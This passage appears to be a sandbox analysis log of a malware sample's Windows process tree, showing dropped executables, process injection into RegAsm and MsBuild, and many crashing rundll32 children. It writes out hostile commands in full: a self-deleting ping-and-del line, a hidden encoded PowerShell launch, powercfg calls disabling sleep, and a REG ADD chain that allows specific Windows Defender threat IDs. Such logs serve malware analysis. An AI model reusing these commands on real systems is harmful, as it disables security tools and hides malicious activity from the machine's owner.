C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:2992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 16765⤵
- Program crash
PID:6032
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 16925⤵
- Program crash
PID:3844
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:464
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 17005⤵
- Program crash
PID:4580
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 17005⤵
- Program crash
PID:6124
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 16845⤵
- Program crash
PID:2916
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 16965⤵
- Program crash
PID:1052
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:1328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 16925⤵
- Program crash
PID:5388
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 16925⤵
- Program crash
PID:6028
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5224
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 17005⤵
- Program crash
PID:2884
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 16805⤵
- Program crash
PID:2184
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 16925⤵
- Program crash
PID:3756
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:1960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 16965⤵
- Program crash
PID:860
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 16965⤵
- Program crash
PID:1140
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 16925⤵
- Program crash
PID:1128
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 16965⤵
- Program crash
PID:1696
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 17005⤵
- Program crash
PID:5164
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4624
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:2912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 16965⤵
- Program crash
PID:4024
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 16765⤵
- Program crash
PID:5740
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:1884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 16965⤵
- Program crash
PID:3632
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 16965⤵
- Program crash
PID:2472
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3068
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 16965⤵
- Program crash
PID:3904
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:1112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 16885⤵
- Program crash
PID:4076
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:1924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 16845⤵
- Program crash
PID:4404
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:2872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 16965⤵
- Program crash
PID:1588
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 16925⤵
- Program crash
PID:3232
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 16965⤵
- Program crash
PID:3236
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 16925⤵
- Program crash
PID:2912
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 16765⤵
- Program crash
PID:4776
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:1892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 16925⤵
- Program crash
PID:1680
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 17005⤵
- Program crash
PID:4532
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 544 -s 16845⤵
- Program crash
PID:3012
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5552
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:2220
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 16885⤵
- Program crash
PID:8
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 17045⤵
- Program crash
PID:996
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 388 -s 17045⤵
- Program crash
PID:1272
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 16805⤵
- Program crash
PID:5292
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 17005⤵
- Program crash
PID:2672
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 16845⤵
- Program crash
PID:3444
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5244
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:2236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 17005⤵
- Program crash
PID:5620
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 692 -s 16965⤵
- Program crash
PID:5932
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 16845⤵PID:3172
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:2360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 16885⤵PID:2212
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5080
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:6016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 16885⤵PID:1816
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3176
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4232
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:1528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 16925⤵PID:3392
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4856 -s 17045⤵PID:5904
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5104
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 16965⤵PID:4792
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 16885⤵PID:4728
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5416
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:1404
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:2128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 16965⤵PID:1936
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:4924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 16805⤵PID:864
-
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:3128
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe4⤵PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\Documents\GuardFox\oI1ZPB2vxSetVpZWfFiI6Wgi.exe"3⤵PID:4608
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
PID:5304
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 8563⤵
- Program crash
PID:4448
-
-
-
C:\Users\Admin\Documents\GuardFox\otr_2ge4eomGQQmUEl_yFDKI.exe"C:\Users\Admin\Documents\GuardFox\otr_2ge4eomGQQmUEl_yFDKI.exe"2⤵
- Executes dropped EXE
PID:1544 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe3⤵PID:2836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 3724⤵
- Program crash
PID:1892
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 10283⤵
- Program crash
PID:1936
-
-
-
C:\Users\Admin\Documents\GuardFox\ASo1Xru8VS6Xfyo5j8fzoFUR.exe"C:\Users\Admin\Documents\GuardFox\ASo1Xru8VS6Xfyo5j8fzoFUR.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1816 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3020
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2044
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:1036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 5844⤵
- Program crash
PID:3232
-
-
-
-
C:\Users\Admin\Documents\GuardFox\k80_0TvoDvIvtBz67zMxLD0b.exe"C:\Users\Admin\Documents\GuardFox\k80_0TvoDvIvtBz67zMxLD0b.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2600
-
-
C:\Users\Admin\Documents\GuardFox\_kwqjZC3zYczCTpbpeL0J3HT.exe"C:\Users\Admin\Documents\GuardFox\_kwqjZC3zYczCTpbpeL0J3HT.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4792 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2392
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3004 -ip 30041⤵PID:2020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1036 -ip 10361⤵PID:4280
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 688 -ip 6881⤵PID:5272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6036 -ip 60361⤵PID:1732
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:5360
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1832
-
-
C:\ProgramData\jndraacsywhc\todymdgvwmgb.exeC:\ProgramData\jndraacsywhc\todymdgvwmgb.exe1⤵PID:5348
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:2408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5684
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:4896
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4768
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:3264
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:5400
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4396
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:5460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1856 -ip 18561⤵PID:3096
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:5056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1544 -ip 15441⤵PID:688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2836 -ip 28361⤵PID:5228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5736 -ip 57361⤵PID:5128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5688 -ip 56881⤵PID:1860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5868
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5848 -ip 58481⤵PID:4812
-
C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ\QlvXnnUJUMNwlEU\JgZkRLp.exeC:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ\QlvXnnUJUMNwlEU\JgZkRLp.exe eu /xosite_idMQk 525403 /S1⤵PID:4728
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:444
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:2888
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5756
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4020
-
-
